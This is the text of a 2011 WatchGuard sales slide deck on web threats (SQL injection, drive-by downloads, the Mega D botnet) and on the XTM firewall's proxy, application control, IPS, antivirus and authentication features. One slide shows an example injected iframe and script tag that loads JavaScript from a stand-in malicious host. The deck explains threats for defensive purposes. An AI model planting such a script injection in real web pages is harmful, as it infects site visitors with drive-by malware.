440 likes | 643 Views
Web is the Battlefield Data Connectors – Boston April 14, 2011. Web is the Battlefield. Sources: X-Force, Websense, Whitehat Security, Imperva, & 7Scan. Why the Web?. Common Web Attacks. Combined Web Attacks. Part 2: Drive-by Download. Part 1: Automated SQL Injection Attack. DB. DB.
E N D
Web is the Battlefield Data Connectors – Boston April 14, 2011
Web is the Battlefield Sources: X-Force, Websense, Whitehat Security, Imperva, & 7Scan
Combined Web Attacks Part 2: Drive-by Download Part 1: Automated SQL Injection Attack DB DB <iframe><script src=“http://EvilWebSite.cn/EvilJavaScript.js”></scirpt></iframe>
Malicious Websites “Drive By Downloads” 1. A user is enticed to view a website. 2. This website installs an application locally without the users knowledge. 3. The Users computer “Dials Home” to an IRC server the hacker “Owns”. Encrypted DATA Leaving Your Network over SSL – 443 At this stage, the computer is under complete control of the hacker, and will follow any of his instructions from this day forward!
What’s a Botnet?When Your Computer is Owned By Someone Else A botnet is a network of compromised computers under the control of a remote attacker/s.
Botnets: Ultimate Blended Threat Botnets are the Swiss Army knife of the malware world, and bot-herders have many blades to choose from.
Botnets: Mega D FBI Busts Alleged Mega D Botnet Mastermind More than 500,000 infected computers Oleg Nikolaenko 1. Initial Infection 2. Compromised computers are “owned” 3. “owned” computers are rented 4. SPAM campaign launched Paid $475,000 . Ten Billion Spam e-mails a day. = 30% OF ALL SPAM WORLDWIDE
Extensible Threat Management • XTM 11.4 = Complete Web Security
XTM Solution – The Application Proxy Packet Reassembly – since 1996 An Application Proxy Checks: Source IP, Destination IP, Port, Protocol If a matching rule (or service) is found: It opens the packet, reads the data, and if no malicious content is found it forwards the data. “Proxy firewall technologies have proven time and again to be more secure than "stateful" firewalls and will prove to be more secure than "deep inspection" firewalls.” What is "Deep Inspection"? – Marcus Ranum
XTM Solution – Closing the Blind Spot HTTPS Proxy Normal SSL SSL Proxy With this method, the firewall can’t see what is “inside” the communicationbetween the PC and the website. With this method, the firewall can perform all checks that a normal HTTP Proxy can.
XTM Solution – Acceptable Use WebBlocker • Establishing Acceptable Sites • 54 Categories • Proxy Sites, WebMail, P2P, IM, Hacking, Phishing, RDP sites • Database Maintained by WebSense • SpeedBump or Override • Logging and Reporting
XTM Solution – Hijacked Sites Reputation Enabled Defense Cloud Based Dynamic Web Protection
2010-07-28 13:28:04 ProxyDrop: HTTP Virus found disp=DENY, policy=HTTP-proxy-00, protocol=http/tcp, src_ip=10.0.1.3, dst_ip=188.40.238.250, dst_port=80 proxy_act=HTTP-Students, virus=EICAR_Test, src_user=student4@Firebox-DB, host=www.eicar.org, path=/download/eicar.com 2010-07-28 13:29:59 ProxyDeny: HTTP bad reputation disp=DENY, policy=HTTP-proxy-00, protocol=http/tcp, src_ip=10.0.1.3 dst_ip=188.40.238.250 dst_port=80, proxy_act=HTTP-Students, src_user=student4@Firebox-DB, reputation=99, host=www.eicar.org, path=/download/eicar.com,
Old View • Network Layer • Ports and Protocols • Source = IP Destination = IP • New View • Considering Content / Data • Controlling the Applications • Marketing/Facebook/Yes • General User/Facebook/No • Control the Allowed traffic and Stop the bad XTM Solution - Application Control
Strategies – Application Control • Many apps tunnel right past your firewall • You lack visibility into what apps do on your network • Most malware propagates via 3rd party and web apps
Application Control - Facebook Critical Mass • More than 500 million active users • 50% of our active users log on to Facebook in any given day • More than 6 billion minutes are spent on Facebook each day (worldwide) http://www.facebook.com/press/info.php?statistics
Application Control - Facebook • More than 550,000 active applications currently on Facebook Platform • More than 250 applications have more than one million monthly active users • More than one million websites have integrated with Facebook Platform • More than 150 million people engage with Facebook on external websites every month http://www.facebook.com/press/info.php?statistics
XTM SolutionControlling Applications Approved applications Control Applicationsby Category Network Peer to Peer Voice over IP Web Streaming Media Software Updates Tunneling Software Unapproved applications Control of 1,500 Applications Business Database File Transfer Instant Messaging Mail Web proxies
XTM Solution – Remote Proxies - Tunneling • HTTP - HTTPs Proxy • WebBlocker • Well known proxy sites • Uncategorized Sites • Home proxies • Application Blocking • Find the By Pass Traffic • Logmein • UnltraSurf • Skype • P2P • Standard and Non Standard Ports
XTM Solution - IPS Network Intrusions are Identified and Blocked Signature set covers : • SQL injections, cross-site scripting (XSS) • buffer overflows • denial of service • remote file inclusions Auto-Updating Scans all ports and protocols to block network, application, and protocol-based attacks Block = Dynamically add source IP to blocked sites list
XTM Solution - AV Network Intrusions are Identified and Blocked Signature database updated hourly Dynamic heuristic analysis uses code emulation to identify polymorphic viruses and dangerous code that Inspection, of compressed files including: .zip, .gzip, .tar, .jar, .rar, .chm, .lha, .pdf, XML/HTML container, OLE container (Microsoft O ce documents), .cab, .arj, .ace, .bz2 (Bzip), .swf. Buffered scanning process ensures optimum performance for in-line HTTP scanning
XTM Solution – Default Packet HandlingNetwork Intrusions are Identified and Blocked Dynamic AutoBlocking Identification of Attack behaviors Spoofing Ip Source Route Port Scans Address Scans Flood Attacks Static Blocked Sites StaitcBlockPorts with Autoblocking option Blocking Policies
XTM – Custom SecurityBest Fit Security Trusted Low Security Required Untrusted High Security Required Medium Security
XTM Solution - User AuthenticationRight Policies for the Right User • Firebox supports User Authentication • Authentication Servers : • Firebox Database (local) • Radius • SecurID • LDAP • Activate Directory (native)
XTM Solution - User Authentication • Auto Redirect Authentication • User can authenticate to the Firebox using an authentication web portal • Or Auto redirect can be configured to this authentication page • User is authenticated with a 2 hour timeout (configurable)
XTM Solution - User Authentication • Single Sign-On Authentication • Automatic authentication of Active Directory users, no manual authentication on the Firewall required anymore • Install WatchGuard Authentication Gateway software on a domain computer (SSO Agent) • The SSO Agent queries the PCs’ of the domain and inform the Firebox Alice Authorized without user having to log on manually SSO Query Alice logged in SSO Info User Alice = IP 10.0.1.100 SSO Agent
XTM Solution - User Authentication • Multiple AD Domain Support • Unlimited AD domains for SSO, manual auth, SSLVPN and IPSec MUVPN. • Each SSO query, manual auth, SSLVPN, MUVPN request specifies the AD domain. • Each configured AD domain can have unique login attribute.
XTM Solution - User Authentication Terminal Services • When this feature is enabled in a Microsoft Terminal Services environment, Fireware XTM uses a “user-resolver” agent deployed on the TS server to identify user so that the XTM appliance can apply firewall policy accordingly. • Agent and traffic handling for Microsoft Terminal Services • Agent installed on multiple TS servers
XTM Solution - User Based PoliciesPeople not IPs • Security Policies applies to users, and not only on IP’s • Allows a build of different sets of policies for different people in the company, even in networks using DHCP
XTM Solution - User Based PoliciesPeople not IPs • 2010-05-12 08:03:52 Deny src_ip=10.0.1.2 dst_ip=74.53.126.157 pr=http/tcpsrc_port=4833 dst_port=80 src_intf=Student-NET dst_intf=Comcast msg=ProxyDeny: HTTP Request categories pckt_len= ttl= policy=(HTTP-proxy-00) proxy_action=HTTP-Studentsproc_id="http-proxy" rc="594" proxy_act="HTTP-Students" cats="Proxies & Translators,cache-hit" op="GET" dstname="proxy.org" arg="/" src_user="student4@Firebox-DB" msg_id="262177" Traffic
XTM Solution - User Based PoliciesReports - People not IPs • Web Traffic Summary • Intrusion Prevention Summary • AntiVirus Summary • spamBlocker Summary • Proxy Summaries • SMTP Proxy Summary • POP3 Proxy • Packet-Filtered Summary • Firebox Statistics • Exceptions • Management Server Audit • Management Reports WatchGuard Training
XTM Solution- User Based Policies Reports - People not IPs • Summaries
XTM Solution - User Based Policies Reports - People not IPs • Web Activity – Student1
George Magee Sales Engineer George.Magee@watchguard.com